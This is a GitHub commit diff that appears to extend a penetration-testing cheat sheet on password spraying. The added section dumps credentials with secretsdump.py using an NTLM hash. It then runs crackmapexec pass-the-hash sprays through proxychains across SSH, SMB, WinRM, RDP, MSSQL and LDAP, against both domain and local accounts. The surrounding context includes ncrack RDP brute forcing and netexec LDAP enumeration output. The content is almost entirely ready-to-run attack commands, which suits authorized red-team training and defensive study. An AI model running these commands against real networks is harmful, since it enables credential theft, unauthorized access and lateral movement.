Update pwd-spraying.md

pull/15/head
NoPurposeInLife 2024-07-25 21:49:15 +08:00 committed by GitHub
parent b0e9832057
commit 2143a1a52e
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 25 additions and 1 deletions

View File

@ -68,6 +68,30 @@ Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.
ncrack connection-limit 1 -vv --user administrator -P password-file.txt rdp://10.10.10.10 ncrack connection-limit 1 -vv --user administrator -P password-file.txt rdp://10.10.10.10
``` ```
## Spray passwords against everything
* Using [crackmapexec](https://github.com/byt3bl33d3r/CrackMapExec)
```
> Take Administrator Password from mimikatz and secretsdump.py (Make sure you copy and save all the hash into hashes.txt)
proxychains4 -q -f /etc/proxychains_9052.conf python secretsdump.py -hashes :077a55c458dc4002dfdc5321a7659526 EXAMPLE.COM/Administrator@sql01.example.com
echo "" >> users.txt
echo "Administrator" >> users.txt
echo "Guest" >> users.txt
echo "DefaultAccount" >> users.txt
echo "WDAGUtilityAccount" >> users.txt
proxychains4 -q ./cme ssh --continue-on-success -u users.txt -H hashes.txt -d example.com targets.txt | grep "\[+\]"
proxychains4 -q ./cme smb --continue-on-success -u users.txt -H hashes.txt -d example.com targets.txt | grep "\[+\]"
proxychains4 -q ./cme winrm --continue-on-success -u users.txt -H hashes.txt -d example.com targets.txt | grep "\[+\]"
proxychains4 -q ./cme rdp --continue-on-success -u users.txt -H hashes.txt -d example.com targets.txt | grep "\[+\]"
proxychains4 -q ./cme mssql --continue-on-success -u users.txt -H hashes.txt -d example.com targets.txt | grep "\[+\]"
proxychains4 -q ./cme ldap --continue-on-success -u users.txt -H hashes.txt -d example.com targets.txt | grep "\[+\]"
proxychains4 -q ./cme ssh --continue-on-success -u users.txt -H hashes.txt --local-auth targets.txt | grep "\[+\]"
proxychains4 -q ./cme smb --continue-on-success -u users.txt -H hashes.txt --local-auth targets.txt | grep "\[+\]"
proxychains4 -q ./cme winrm --continue-on-success -u users.txt -H hashes.txt --local-auth targets.txt | grep "\[+\]"
proxychains4 -q ./cme rdp --continue-on-success -u users.txt -H hashes.txt --local-auth targets.txt | grep "\[+\]"
proxychains4 -q ./cme mssql --continue-on-success -u users.txt -H hashes.txt --local-auth targets.txt | grep "\[+\]"
proxychains4 -q ./cme ldap --continue-on-success -u users.txt -H hashes.txt --local-auth targets.txt | grep "\[+\]"
```
## BadPwdCount attribute ## BadPwdCount attribute
@ -77,4 +101,4 @@ Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.
$ netexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --users $ netexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --users
LDAP 10.0.2.11 389 dc01 Guest badpwdcount: 0 pwdLastSet: <never> LDAP 10.0.2.11 389 dc01 Guest badpwdcount: 0 pwdLastSet: <never>
LDAP 10.0.2.11 389 dc01 krbtgt badpwdcount: 0 pwdLastSet: <never> LDAP 10.0.2.11 389 dc01 krbtgt badpwdcount: 0 pwdLastSet: <never>
``` ```